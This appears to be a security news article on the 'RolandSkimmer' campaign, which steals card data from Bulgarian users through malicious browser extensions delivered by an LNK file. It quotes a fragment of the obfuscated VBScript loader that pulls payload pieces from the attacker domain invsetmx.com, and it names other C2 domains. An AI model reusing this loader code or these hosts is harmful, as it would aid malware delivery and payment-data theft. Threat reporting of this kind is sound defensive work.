A sophisticated new credit card skimming operation dubbed “RolandSkimmer” has emerged, targeting users primarily in Bulgaria through malicious browser extensions.
Named after the unique string “Rol@and4You” embedded in its payload, this attack represents a concerning evolution in web-based financial theft techniques.
The malware systematically harvests sensitive payment information from victims while maintaining persistent access to their systems through compromised web browsers.
.png
)
The attack begins with a deceptive ZIP file named “faktura_3716804.zip” containing a seemingly innocuous shortcut file.
.webp)
Once executed, this LNK file initiates a complex chain of obfuscated scripts that establish covert access to the victim’s system.
Unlike traditional skimmers that target e-commerce websites directly, RolandSkimmer focuses on compromising the browsers themselves, creating a persistent threat that follows users across multiple websites.
What makes RolandSkimmer particularly dangerous is its multi-browser approach, simultaneously targeting Google Chrome, Microsoft Edge, and Mozilla Firefox through tailored malicious extensions.
These extensions request extensive permissions including the ability to read all web content, modify network requests, and access browsing data, enabling comprehensive monitoring of victims’ online activities.
The attackers employ sophisticated obfuscation techniques to evade detection, with XOR-encoded payloads and dynamically generated components.
Fortinet researchers identified the campaign in March 2025, documenting how the malware establishes persistence by creating hidden folders and modifying browser shortcuts.
“This represents an alarming trend in financial theft malware,” noted FortiGuard Labs in their recent analysis, highlighting the threat’s sophisticated evasion mechanisms and cross-browser capabilities.
The operators behind RolandSkimmer have constructed an elaborate command and control infrastructure spanning multiple domains, including invsetmx[.]com, exmkleo[.]com, and bg3dsec[.]com.
These servers deliver malicious payloads and serve as collection points for stolen financial data, with each victim assigned a unique tracking identifier to monitor their activity across browsing sessions.
Infection Mechanism and Extension Deployment
The initial infection process begins when users extract and click the malicious LNK file, which executes a heavily obfuscated script chain.
.webp)
This script connects to the attacker’s server and downloads additional components disguised with false extensions.
One critical component masquerades as a JPEG image (n.jpg) but actually contains VBScript code that executes directly in memory without writing to disk.
.webp)
on error resume next:q1="8a9b1c3":for q2=1 to 76046:if q7=q6 then:q8="":else:q8=q6:
q7=q6:end if:Set q3=CreateObject("MSXML2.ServerXMLHTTP.6.0"):q3.open "GET",
"http://invsetmx.com/default.aspx?V="&q2&"&R=#-@-"&q8,False:q3.send:q4=Split(
q3.responseText,"-@-"):if q5=q4(1) then:else:q5=q4(1):q9 = "":For w1=1 to Len(q4(1))The malware then performs system reconnaissance to gather environment details, including checking for installed browsers and hardware specifications.
For Microsoft Edge, it creates a folder at “%APPDATA%..\Local\s2ch97” containing a malicious extension disguised as “Disable Content Security Policy.”
This extension’s manifest requests extensive permissions, including “declarativeNetRequest,” “browsingData,” “tabs,” and “storage.”
The extension’s background scripts monitor form submissions across all websites, specifically targeting credit card numbers. When payment details are detected, the malicious code appends the unique marker “Rol@and4You” to the stolen data and exfiltrates it to remote servers through hidden elements in the page.
The careful design of this attack chain enables persistent access without requiring elevated privileges, allowing the attackers to maintain long-term access to victims’ browsers and financial information.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
